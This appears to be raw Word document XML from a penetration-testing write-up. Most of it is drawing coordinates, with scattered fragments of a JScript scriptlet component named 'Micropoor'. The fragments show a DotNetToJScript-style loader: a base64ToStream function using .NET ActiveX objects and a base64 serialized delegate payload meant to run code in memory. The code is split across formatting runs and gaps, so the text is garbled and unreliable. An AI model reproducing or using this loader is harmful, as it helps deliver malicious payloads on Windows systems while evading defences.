2680,15492,2680,15491,2680,15489,2680,15488,2680,15487,2680,15485,2680,15484,2680,15482,2680,15481,2680,15479,2680,15477,2680,15476,2680,15474,2680,15472,2680,15470,2680,15468,2680,15466,2680,15464,2680,15462,2680,15460,2680,15458,2680,15455,2680,15453,2680,15450,2680,15448,2680,15445,2680,15443,2680,15440,2680,15437,2680,15434,2680,15431,2680,15428,2680,15425,2680,15422,2680,15419,2680,15416,2680,15412,2680,15409,2680,15405,2680,15401,2680,15398,2680,15394,2680,15390,2680,15386,2680,15382,2680,15378,2680,15374,2680,15369,2680,15365,2680,15360,2680,15356,2680,15351,2680,15346,2680,15342,2680,15337,2680,15331,2680,15326,2680,15321,2680,15316,2680,15310,2680,15305,2680,15299,2680,15293,2680,15288,2680,15282,2680,15275,2680,15269,2680,15263,2680,1525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91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package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6712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component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id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"Micropoor"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5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script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language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"JScript"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91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CDATA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function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setversion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-2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function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debug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{}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function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base64ToStream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b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{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enc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ActiveXObject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"System.Text.ASCIIEncoding"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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3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length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enc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GetByteCount_2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b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ba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enc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GetBytes_4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b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transform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ActiveXObject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"System.Security.Cryptography.FromB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ase64Transform"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ba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transform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TransformFinalBlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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ba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length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ms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ActiveXObject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"System.IO.MemoryStream"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22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ms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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Write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ba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length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ms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Position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return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ms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62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-6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22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="21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serialized_obj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"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdh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dGVTZXJpYWxpemF0aW9uSG9sZGVy"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"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2Vya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WFsaXph"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"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb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25Ib2xk"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"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJA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gAAAAkD"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"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0Rlb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GVnYXRl"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"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50Y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XJnZXRU"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"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ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2F0ZVNl"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"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lL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lJlbW90"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"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249M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i4wLjAu"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"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5B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gcAAAAH"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33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"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZ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QoEAwAA"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9.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,65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1000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1000l1517,1000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8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8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4,10484,3575,10484,3577,10484,3579,10484,3581,10484,3583,10484,3586,10484,3588,10484,3591,10484,3593,10484,3596,10484,3599,10484,3602,10484,3605,10484,3608,10484,3611,10484,3615,10484,3618,10484,3622,10484,3626,10484,3629,10484,3634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4,1517,3575,1517,3577,1517,3579,1517,3581,1517,3583,1517,3586,1517,3588,1517,3591,1517,3593,1517,3596,1517,3599,1517,3602,1517,3605,1517,3608,1517,3611,1517,3615,1517,3618,1517,3622,1517,3626,1517,3629,1517,3634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6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5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3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6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1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3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3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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:6730;width:8990;height:630" coordorigin="1490,6730" coordsize="8990,6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8,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6749,10484,6749,10484,6749,10484,6750,10484,6750,10484,6750,10484,6751,10484,6751,10484,6752,10484,6753,10484,6753,10484,6754,10484,6755,10484,6756,10484,6757,10484,6757,10484,6759,10484,6760,10484,6761,10484,6762,10484,6763,10484,6765,10484,6766,10484,6768,10484,6770,10484,6771,10484,6773,10484,6775,10484,6777,10484,6779,10484,6781,10484,6784,10484,6786,10484,6789,10484,6791,10484,6794,10484,6797,10484,6800,10484,6803,10484,6806,10484,6810,10484,6813,10484,6817,10484,6820,10484,6824,10484,6828,10484,6832,10484,6837,10484,6841,10484,6845,10484,6850,10484,6855,10484,6860,10484,6865,10484,6870,10484,6876,10484,6881,10484,6887,10484,6893,10484,6899,10484,6905,10484,6912,10484,6918,10484,6925,10484,6932,10484,6939,10484,6946,10484,6954,10484,6961,10484,6969,10484,6977,10484,6985,10484,6994,10484,7002,10484,7011,10484,7020,10484,7029,10484,7039,10484,7048,10484,7058,10484,7068,10484,7078,10484,7089,10484,7099,10484,7110,10484,7121,10484,7133,10484,7144,10484,7156,10484,7168,10484,7180,10484,7193,10484,7206,10484,7219,10484,7232,10484,7245,10484,7259,10484,7273,10484,7287,10484,7302,10484,7316,10484,7331,10484,7346,10484,7362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7,1510,7377,1510,7377,1510,7377,1510,7377,1510,7377,1510,7376,1510,7376,1510,7376,1510,7376,1510,7375,1510,7375,1510,7374,1510,7374,1510,7373,1510,7373,1510,7372,1510,7371,1510,7370,1510,7370,1510,7369,1510,7368,1510,7367,1510,7365,1510,7364,1510,7363,1510,7362,1510,7360,1510,7359,1510,7357,1510,7356,1510,7354,1510,7352,1510,7350,1510,7348,1510,7346,1510,7344,1510,7341,1510,7339,1510,7336,1510,7334,1510,7331,1510,7328,1510,7325,1510,7322,1510,7319,1510,7315,1510,7312,1510,7308,1510,7305,1510,7301,1510,7297,1510,7293,1510,7289,1510,7284,1510,7280,1510,7275,1510,7270,1510,7265,1510,7260,1510,7255,1510,7249,1510,7244,1510,7238,1510,7232,1510,7226,1510,7220,1510,7214,1510,7207,1510,7200,1510,7193,1510,7186,1510,7179,1510,7171,1510,7164,1510,7156,1510,7148,1510,7140,1510,7131,1510,7123,1510,7114,1510,7105,1510,7096,1510,7086,1510,7077,1510,7067,1510,7057,1510,7047,1510,7036,1510,7026,1510,7015,1510,7004,1510,6992,1510,6981,1510,6969,1510,6957,1510,6945,1510,6932,1510,6920,1510,6907,1510,6893,1510,6880,1510,6866,1510,6852,1510,6838,1510,6824,1510,6809,1510,6794,1510,6779,1510,6763,1510,6747e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:336.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:6730;width:30;height:650" coordorigin="1490,6730" coordsize="30,650" path="m1517,6747l1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6749,1517,6749,1517,6749,1517,6750,1517,6750,1517,6750,1517,6751,1517,6751,1517,6752,1517,6753,1517,6753,1517,6754,1517,6755,1517,6756,1517,6757,1517,6757,1517,6759,1517,6760,1517,6761,1517,6762,1517,6763,1517,6765,1517,6766,1517,6768,1517,6770,1517,6771,1517,6773,1517,6775,1517,6777,1517,6779,1517,6781,1517,6784,1517,6786,1517,6789,1517,6791,1517,6794,1517,6797,1517,6800,1517,6803,1517,6806,1517,6810,1517,6813,1517,6817,1517,6820,1517,6824,1517,6828,1517,6832,1517,6837,1517,6841,1517,6845,1517,6850,1517,6855,1517,6860,1517,6865,1517,6870,1517,6876,1517,6881,1517,6887,1517,6893,1517,6899,1517,6905,1517,6912,1517,6918,1517,6925,1517,6932,1517,6939,1517,6946,1517,6954,1517,6961,1517,6969,1517,6977,1517,6985,1517,6994,1517,7002,1517,7011,1517,7020,1517,7029,1517,7039,1517,7048,1517,7058,1517,7068,1517,7078,1517,7089,1517,7099,1517,7110,1517,7121,1517,7133,1517,7144,1517,7156,1517,7168,1517,7180,1517,7193,1517,7206,1517,7219,1517,7232,1517,7245,1517,7259,1517,7273,1517,7287,1517,7302,1517,7316,1517,7331,1517,7346,1517,7362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33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7350" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:7350;width:8990;height:670" coordorigin="1490,7350" coordsize="8990,67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9,10484,7379,10484,7379,10484,7379,10484,7380,10484,7380,10484,7380,10484,7381,10484,7381,10484,7382,10484,7382,10484,7383,10484,7384,10484,7384,10484,7385,10484,7386,10484,7387,10484,7388,10484,7389,10484,7390,10484,7391,10484,7393,10484,7394,10484,7396,10484,7397,10484,7399,10484,7400,10484,7402,10484,7404,10484,7406,10484,7408,10484,7410,10484,7413,10484,7415,10484,7417,10484,7420,10484,7423,10484,7426,10484,7429,10484,7432,10484,7435,10484,7438,10484,7441,10484,7445,10484,7449,10484,7452,10484,7456,10484,7460,10484,7465,10484,7469,10484,7473,10484,7478,10484,7483,10484,7488,10484,7493,10484,7498,10484,7504,10484,7509,10484,7515,10484,7521,10484,7527,10484,7533,10484,7539,10484,7546,10484,7553,10484,7559,10484,7567,10484,7574,10484,7581,10484,7589,10484,7597,10484,7605,10484,7613,10484,7621,10484,7630,10484,7639,10484,7648,10484,7657,10484,7666,10484,7676,10484,7686,10484,7696,10484,7706,10484,7717,10484,7727,10484,7738,10484,7749,10484,7761,10484,7772,10484,7784,10484,7796,10484,7808,10484,7821,10484,7834,10484,7847,10484,7860,10484,7874,10484,7887,10484,7901,10484,7916,10484,7930,10484,7945,10484,7960,10484,7975,10484,7991,10484,8007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2,1510,8022,1510,8022,1510,8022,1510,8021,1510,8021,1510,8021,1510,8020,1510,8020,1510,8019,1510,8019,1510,8018,1510,8018,1510,8017,1510,8016,1510,8016,1510,8015,1510,8014,1510,8013,1510,8012,1510,8010,1510,8009,1510,8008,1510,8007,1510,8005,1510,8004,1510,8002,1510,8000,1510,7999,1510,7997,1510,7995,1510,7993,1510,7990,1510,7988,1510,7986,1510,7983,1510,7981,1510,7978,1510,7975,1510,7972,1510,7969,1510,7966,1510,7963,1510,7959,1510,7956,1510,7952,1510,7948,1510,7944,1510,7940,1510,7936,1510,7932,1510,7927,1510,7923,1510,7918,1510,7913,1510,7908,1510,7903,1510,7897,1510,7892,1510,7886,1510,7880,1510,7874,1510,7868,1510,7861,1510,7855,1510,7848,1510,7841,1510,7834,1510,7827,1510,7820,1510,7812,1510,7804,1510,7796,1510,7788,1510,7779,1510,7771,1510,7762,1510,7753,1510,7744,1510,7734,1510,7725,1510,7715,1510,7705,1510,7695,1510,7684,1510,7674,1510,7663,1510,7651,1510,7640,1510,7628,1510,7617,1510,7605,1510,7592,1510,7580,1510,7567,1510,7554,1510,7541,1510,7527,1510,7513,1510,7499,1510,7485,1510,7470,1510,7456,1510,7441,1510,7425,1510,7410,1510,7394,1510,7378e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:368.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7370" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:7370;width:30;height:650" coordorigin="1490,7370" coordsize="30,650" path="m1517,7378l1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7379,1517,7379,1517,7379,1517,7379,1517,7380,1517,7380,1517,7380,1517,7381,1517,7381,1517,7382,1517,7382,1517,7383,1517,7384,1517,7384,1517,7385,1517,7386,1517,7387,1517,7388,1517,7389,1517,7390,1517,7391,1517,7393,1517,7394,1517,7396,1517,7397,1517,7399,1517,7400,1517,7402,1517,7404,1517,7406,1517,7408,1517,7410,1517,7413,1517,7415,1517,7417,1517,7420,1517,7423,1517,7426,1517,7429,1517,7432,1517,7435,1517,7438,1517,7441,1517,7445,1517,7449,1517,7452,1517,7456,1517,7460,1517,7465,1517,7469,1517,7473,1517,7478,1517,7483,1517,7488,1517,7493,1517,7498,1517,7504,1517,7509,1517,7515,1517,7521,1517,7527,1517,7533,1517,7539,1517,7546,1517,7553,1517,7559,1517,7567,1517,7574,1517,7581,1517,7589,1517,7597,1517,7605,1517,7613,1517,7621,1517,7630,1517,7639,1517,7648,1517,7657,1517,7666,1517,7676,1517,7686,1517,7696,1517,7706,1517,7717,1517,7727,1517,7738,1517,7749,1517,7761,1517,7772,1517,7784,1517,7796,1517,7808,1517,7821,1517,7834,1517,7847,1517,7860,1517,7874,1517,7887,1517,7901,1517,7916,1517,7930,1517,7945,1517,7960,1517,7975,1517,7991,1517,8007,1517,8023e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:400.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8010" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:8010;width:8990;height:630" coordorigin="1490,8010" coordsize="8990,630" path="m1510,8023l1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1511,8023,1512,8023,1512,8023,1514,8023,1515,8023,1517,8023,1519,8023,1521,8023,1524,8023,1528,8023,1532,8023,1536,8023,1541,8023,1546,8023,1552,8023,1559,8023,1566,8023,1575,8023,1583,8023,1593,8023,1603,8023,1615,8023,1627,8023,1640,8023,1654,8023,1668,8023,1684,8023,1701,8023,1719,8023,1738,8023,1758,8023,1780,8023,1802,8023,1826,8023,1851,8023,1877,8023,1904,8023,1933,8023,1963,8023,1995,8023,2028,8023,2063,8023,2099,8023,2136,8023,2175,8023,2216,8023,2259,8023,2303,8023,2348,8023,2396,8023,2445,8023,2496,8023,2549,8023,2604,8023,2660,8023,2719,8023,2779,8023,2841,8023,2906,8023,2972,8023,3041,8023,3112,8023,3184,8023,3259,8023,3336,8023,3416,8023,3498,8023,3582,8023,3668,8023,3757,8023,3848,8023,3941,8023,4037,8023,4136,8023,4236,8023,4340,8023,4446,8023,4555,8023,4666,8023,4780,8023,4897,8023,5017,8023,5139,8023,5264,8023,5392,8023,5523,8023,5657,8023,5793,8023,5933,8023,6076,8023,6222,8023,6370,8023,6522,8023,6677,8023,6835,8023,6997,8023,7161,8023,7329,8023,7500,8023,7675,8023,7853,8023,8034,8023,8219,8023,8407,8023,8598,8023,8793,8023,8992,8023,9194,8023,9400,8023,9609,8023,9823,8023,10039,8023,10260,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8023,10484,8024,10484,8024,10484,8024,10484,8024,10484,8024,10484,8025,10484,8025,10484,8025,10484,8026,10484,8026,10484,8027,10484,8027,10484,8028,10484,8028,10484,8029,10484,8030,10484,8030,10484,8031,10484,8032,10484,8033,10484,8034,10484,8035,10484,8036,10484,8038,10484,8039,10484,8040,10484,8042,10484,8044,10484,8045,10484,8047,10484,8049,10484,8051,10484,8053,10484,8055,10484,8057,10484,8059,10484,8062,10484,8064,10484,8067,10484,8070,10484,8073,10484,8076,10484,8079,10484,8082,10484,8085,10484,8089,10484,8092,10484,8096,10484,8100,10484,8104,10484,8108,10484,8112,10484,8117,10484,8121,10484,8126,10484,8131,10484,8136,10484,8141,10484,8146,10484,8151,10484,8157,10484,8163,10484,8169,10484,8175,10484,8181,10484,8187,10484,8194,10484,8201,10484,8207,10484,8215,10484,8222,10484,8229,10484,8237,10484,8245,10484,8253,10484,8261,10484,8269,10484,8278,10484,8287,10484,8296,10484,8305,10484,8314,10484,8324,10484,8334,10484,8344,10484,8354,10484,8364,10484,8375,10484,8386,10484,8397,10484,8408,10484,8420,10484,8432,10484,8444,10484,8456,10484,8469,10484,8481,10484,8494,10484,8507,10484,8521,10484,8535,10484,8549,10484,8563,10484,8577,10484,8592,10484,8607,10484,8622,10484,8638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2,1510,8652,1510,8652,1510,8652,1510,8651,1510,8651,1510,8650,1510,8650,1510,8649,1510,8649,1510,8648,1510,8648,1510,8647,1510,8646,1510,8645,1510,8644,1510,8643,1510,8642,1510,8641,1510,8640,1510,8639,1510,8637,1510,8636,1510,8634,1510,8633,1510,8631,1510,8629,1510,8628,1510,8626,1510,8624,1510,8621,1510,8619,1510,8617,1510,8615,1510,8612,1510,8609,1510,8607,1510,8604,1510,8601,1510,8598,1510,8594,1510,8591,1510,8588,1510,8584,1510,8580,1510,8577,1510,8573,1510,8568,1510,8564,1510,8560,1510,8555,1510,8551,1510,8546,1510,8541,1510,8536,1510,8530,1510,8525,1510,8519,1510,8514,1510,8508,1510,8502,1510,8496,1510,8489,1510,8483,1510,8476,1510,8469,1510,8462,1510,8455,1510,8447,1510,8439,1510,8432,1510,8424,1510,8415,1510,8407,1510,8398,1510,8390,1510,8381,1510,8371,1510,8362,1510,8352,1510,8343,1510,8333,1510,8322,1510,8312,1510,8301,1510,8290,1510,8279,1510,8268,1510,8256,1510,8245,1510,8233,1510,8220,1510,8208,1510,8195,1510,8182,1510,8169,1510,8156,1510,8142,1510,8128,1510,8114,1510,8099,1510,8084,1510,8070,1510,8054,1510,8039,1510,8023e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:400.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8010" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:8010;width:30;height:650" coordorigin="1490,8010" coordsize="30,650" path="m1517,8023l1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8023,1517,8024,1517,8024,1517,8024,1517,8024,1517,8024,1517,8025,1517,8025,1517,8025,1517,8026,1517,8026,1517,8027,1517,8027,1517,8028,1517,8028,1517,8029,1517,8030,1517,8030,1517,8031,1517,8032,1517,8033,1517,8034,1517,8035,1517,8036,1517,8038,1517,8039,1517,8040,1517,8042,1517,8044,1517,8045,1517,8047,1517,8049,1517,8051,1517,8053,1517,8055,1517,8057,1517,8059,1517,8062,1517,8064,1517,8067,1517,8070,1517,8073,1517,8076,1517,8079,1517,8082,1517,8085,1517,8089,1517,8092,1517,8096,1517,8100,1517,8104,1517,8108,1517,8112,1517,8117,1517,8121,1517,8126,1517,8131,1517,8136,1517,8141,1517,8146,1517,8151,1517,8157,1517,8163,1517,8169,1517,8175,1517,8181,1517,8187,1517,8194,1517,8201,1517,8207,1517,8215,1517,8222,1517,8229,1517,8237,1517,8245,1517,8253,1517,8261,1517,8269,1517,8278,1517,8287,1517,8296,1517,8305,1517,8314,1517,8324,1517,8334,1517,8344,1517,8354,1517,8364,1517,8375,1517,8386,1517,8397,1517,8408,1517,8420,1517,8432,1517,8444,1517,8456,1517,8469,1517,8481,1517,8494,1517,8507,1517,8521,1517,8535,1517,8549,1517,8563,1517,8577,1517,8592,1517,8607,1517,8622,1517,8638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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8630" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:8630;width:8990;height:650" coordorigin="1490,8630" coordsize="8990,6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4,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8654,10484,8655,10484,8655,10484,8655,10484,8656,10484,8656,10484,8656,10484,8657,10484,8657,10484,8658,10484,8659,10484,8659,10484,8660,10484,8661,10484,8662,10484,8663,10484,8664,10484,8665,10484,8666,10484,8667,10484,8668,10484,8670,10484,8671,10484,8673,10484,8674,10484,8676,10484,8678,10484,8680,10484,8682,10484,8684,10484,8686,10484,8688,10484,8691,10484,8693,10484,8696,10484,8698,10484,8701,10484,8704,10484,8707,10484,8710,10484,8714,10484,8717,10484,8721,10484,8724,10484,8728,10484,8732,10484,8736,10484,8740,10484,8745,10484,8749,10484,8754,10484,8759,10484,8763,10484,8769,10484,8774,10484,8779,10484,8785,10484,8790,10484,8796,10484,8802,10484,8809,10484,8815,10484,8821,10484,8828,10484,8835,10484,8842,10484,8849,10484,8857,10484,8865,10484,8872,10484,8880,10484,8889,10484,8897,10484,8906,10484,8914,10484,8923,10484,8933,10484,8942,10484,8952,10484,8961,10484,8971,10484,8982,10484,8992,10484,9003,10484,9014,10484,9025,10484,9036,10484,9048,10484,9060,10484,9072,10484,9084,10484,9097,10484,9109,10484,9122,10484,9136,10484,9149,10484,9163,10484,9177,10484,9191,10484,9206,10484,9221,10484,9236,10484,9251,10484,9267,10484,9283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8,1510,9298,1510,9298,1510,9298,1510,9298,1510,9298,1510,9298,1510,9297,1510,9297,1510,9297,1510,9296,1510,9296,1510,9296,1510,9295,1510,9295,1510,9294,1510,9293,1510,9293,1510,9292,1510,9291,1510,9290,1510,9289,1510,9288,1510,9287,1510,9286,1510,9285,1510,9284,1510,9282,1510,9281,1510,9279,1510,9278,1510,9276,1510,9274,1510,9272,1510,9270,1510,9268,1510,9266,1510,9264,1510,9261,1510,9259,1510,9256,1510,9254,1510,9251,1510,9248,1510,9245,1510,9242,1510,9238,1510,9235,1510,9231,1510,9228,1510,9224,1510,9220,1510,9216,1510,9212,1510,9207,1510,9203,1510,9198,1510,9194,1510,9189,1510,9184,1510,9178,1510,9173,1510,9167,1510,9162,1510,9156,1510,9150,1510,9144,1510,9137,1510,9131,1510,9124,1510,9117,1510,9110,1510,9103,1510,9095,1510,9088,1510,9080,1510,9072,1510,9064,1510,9055,1510,9047,1510,9038,1510,9029,1510,9020,1510,9010,1510,9000,1510,8991,1510,8981,1510,8970,1510,8960,1510,8949,1510,8938,1510,8927,1510,8916,1510,8904,1510,8892,1510,8880,1510,8868,1510,8855,1510,8843,1510,8830,1510,8816,1510,8803,1510,8789,1510,8775,1510,8761,1510,8746,1510,8731,1510,8716,1510,8701,1510,8685,1510,8669,1510,8653e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:432.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8650" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:8650;width:30;height:650" coordorigin="1490,8650" coordsize="30,650" path="m1517,8653l1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8653,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8654,1517,8655,1517,8655,1517,8655,1517,8656,1517,8656,1517,8656,1517,8657,1517,8657,1517,8658,1517,8659,1517,8659,1517,8660,1517,8661,1517,8662,1517,8663,1517,8664,1517,8665,1517,8666,1517,8667,1517,8668,1517,8670,1517,8671,1517,8673,1517,8674,1517,8676,1517,8678,1517,8680,1517,8682,1517,8684,1517,8686,1517,8688,1517,8691,1517,8693,1517,8696,1517,8698,1517,8701,1517,8704,1517,8707,1517,8710,1517,8714,1517,8717,1517,8721,1517,8724,1517,8728,1517,8732,1517,8736,1517,8740,1517,8745,1517,8749,1517,8754,1517,8759,1517,8763,1517,8769,1517,8774,1517,8779,1517,8785,1517,8790,1517,8796,1517,8802,1517,8809,1517,8815,1517,8821,1517,8828,1517,8835,1517,8842,1517,8849,1517,8857,1517,8865,1517,8872,1517,8880,1517,8889,1517,8897,1517,8906,1517,8914,1517,8923,1517,8933,1517,8942,1517,8952,1517,8961,1517,8971,1517,8982,1517,8992,1517,9003,1517,9014,1517,9025,1517,9036,1517,9048,1517,9060,1517,9072,1517,9084,1517,9097,1517,9109,1517,9122,1517,9136,1517,9149,1517,9163,1517,9177,1517,9191,1517,9206,1517,9221,1517,9236,1517,9251,1517,9267,1517,9283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32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9270" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:9270;width:8990;height:650" coordorigin="1490,9270" coordsize="8990,65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300,10484,9300,10484,9300,10484,9300,10484,9301,10484,9301,10484,9301,10484,9302,10484,9302,10484,9303,10484,9303,10484,9304,10484,9305,10484,9305,10484,9306,10484,9307,10484,9308,10484,9309,10484,9310,10484,9311,10484,9312,10484,9313,10484,9315,10484,9316,10484,9318,10484,9319,10484,9321,10484,9323,10484,9324,10484,9326,10484,9328,10484,9331,10484,9333,10484,9335,10484,9338,10484,9340,10484,9343,10484,9345,10484,9348,10484,9351,10484,9354,10484,9358,10484,9361,10484,9364,10484,9368,10484,9372,10484,9376,10484,9379,10484,9384,10484,9388,10484,9392,10484,9397,10484,9401,10484,9406,10484,9411,10484,9416,10484,9422,10484,9427,10484,9433,10484,9438,10484,9444,10484,9450,10484,9456,10484,9463,10484,9469,10484,9476,10484,9483,10484,9490,10484,9497,10484,9505,10484,9513,10484,9520,10484,9528,10484,9537,10484,9545,10484,9554,10484,9562,10484,9571,10484,9581,10484,9590,10484,9600,10484,9609,10484,9619,10484,9630,10484,9640,10484,9651,10484,9662,10484,9673,10484,9684,10484,9696,10484,9707,10484,9719,10484,9732,10484,9744,10484,9757,10484,9770,10484,9783,10484,9797,10484,9810,10484,9824,10484,9838,10484,9853,10484,9868,10484,9883,10484,9898,10484,9913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9,1510,9928,1510,9928,1510,9928,1510,9928,1510,9927,1510,9927,1510,9927,1510,9926,1510,9926,1510,9926,1510,9925,1510,9924,1510,9924,1510,9923,1510,9922,1510,9922,1510,9921,1510,9920,1510,9919,1510,9918,1510,9917,1510,9916,1510,9914,1510,9913,1510,9912,1510,9910,1510,9908,1510,9907,1510,9905,1510,9903,1510,9901,1510,9899,1510,9897,1510,9895,1510,9893,1510,9890,1510,9888,1510,9885,1510,9882,1510,9879,1510,9876,1510,9873,1510,9870,1510,9867,1510,9863,1510,9860,1510,9856,1510,9852,1510,9848,1510,9844,1510,9840,1510,9835,1510,9831,1510,9826,1510,9821,1510,9817,1510,9811,1510,9806,1510,9801,1510,9795,1510,9789,1510,9783,1510,9777,1510,9771,1510,9765,1510,9758,1510,9752,1510,9745,1510,9737,1510,9730,1510,9723,1510,9715,1510,9707,1510,9699,1510,9691,1510,9683,1510,9674,1510,9665,1510,9656,1510,9647,1510,9638,1510,9628,1510,9618,1510,9608,1510,9598,1510,9588,1510,9577,1510,9566,1510,9555,1510,9544,1510,9532,1510,9520,1510,9508,1510,9496,1510,9484,1510,9471,1510,9458,1510,9445,1510,9431,1510,9417,1510,9404,1510,9389,1510,9375,1510,9360,1510,9345,1510,9330,1510,9314,1510,9299e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:464.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9290" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:9290;width:30;height:630" coordorigin="1490,9290" coordsize="30,630" 